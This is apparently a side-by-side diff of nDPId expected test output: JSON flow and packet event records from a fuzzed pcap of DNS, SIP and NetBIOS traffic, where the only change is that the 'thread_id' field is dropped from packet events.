00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1166,26 +1166,26 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1120470966440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAABEa+gAAIARS23AqAECwKgBAQr9ADUAMIS+oAMAAAABAAAAAAAAATEBMAEwEzEyNwdpbi1hZGByBGFycGEAAAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1120470966440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAABEa+gAAIARS23AqAECwKgBAQr9ADUAMIS+oAMAAAABAAAAAAAAATEBMAEwEzEyNwdpbi1hZGByBGFycGEAAAwAAQ=="}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"AJrtBW69ADBUADRWCABFAJFbeQBAAEARtz7AqAEBwKgBAgA1Cv0AR2c6oAOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGTyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"AJrtBW69ADBUADRWCABFAJFbeQBAAEARtz7AqAEBwKgBAgA1Cv0AR2c6oAOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGTyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470966442} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470966442}
01444{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":856,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":856,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAGtKa+kAAIARE\/rAqAEC1PIhIxPEE8QDNtslSU5WSVRFIHNpcDozNTEwNDcyNEBzaXAuY3liZXJraXR5LmRrIFNJUC8yLjANClZpYbcgU0lQLzIuMC9VRFAgMY4yLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTE4ODgyOTgtNDQ4ZTM3NzcxOaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01430{"packet_event_id":1,"packet_event_name":"packet","packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":856,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":856,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAGtKa+kAAIARE\/rAqAEC1PIhIxPEE8QDNtslSU5WSVRFIHNpcDozNTEwNDcyNEBzaXAuY3liZXJraXR5LmRrIFNJUC8yLjANClZpYbcgU0lQLzIuMC9VRFAgMY4yLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTE4ODgyOTgtNDQ4ZTM3NzcxOaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":822,"global_ts_msec":1120470966443} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":822,"global_ts_msec":1120470966443}
00795{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":604,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":371,"pkt_l4_len":0,"thread_ts_msec":1120470966601,"pkt":"ADBUADRWAODtAW69CABFAAFla+oIAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00781{"packet_event_id":1,"packet_event_name":"packet","packet_id":604,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":371,"pkt_l4_len":0,"thread_ts_msec":1120470966601,"pkt":"ADBUADRWAODtAW69CABFAAFla+oIAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":604,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":337,"global_ts_msec":1120470966606} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":604,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":337,"global_ts_msec":1120470966606}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1120470966852,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470966852,"pkt":"ADBUADR2AODtAW69CABFAABIa+sAAIARS2bAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcAJzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1120470966852,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470966852,"pkt":"ADBUADR2AODtAW69CABFAABIa+sAAIARS2bAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcAJzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"ADBUADRWAODtAW69CABFAABIa+yjAIARS2XAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"ADBUADRWAODtAW69CABFAABIa+yjAIARS2XAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470967846} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470967846}
00410{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":607,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"ADBUADRWAODtASVzAABFAABIa+0AAIARS2TAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABGRzaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00396{"packet_event_id":1,"packet_event_name":"packet","packet_id":607,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"ADBUADRWAODtASVzAABFAABIa+0AAIARS2TAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABGRzaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":607,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1120470969849} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":607,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1120470969849}
00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":608,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"\/\/\/\/\/\/\/\/AODtAW69AABFAABOa+4AAIARSl\/AqAECwKgB\/wCJAIkAOlt8hV8BEAABAAAAAAAAIEVGRW9FSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQTVNAAAgAAE="} 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":608,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"\/\/\/\/\/\/\/\/AODtAW69AABFAABOa+4AAIARSl\/AqAECwKgB\/wCJAIkAOlt8hV8BEAABAAAAAAAAIEVGRW9FSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQTVNAAAgAAE="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":608,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1120470971072} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":608,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1120470971072}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1120470971822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470971822,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+8AAIARSl7AqAECwKgBJXMAAIkAOls8hV8BEAABAAAAAAAAIUVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1120470971822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470971822,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+8AAIARSl7AqAECwKgBJXMAAIkAOls8hV8BEAABAAAAAAAAIUVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
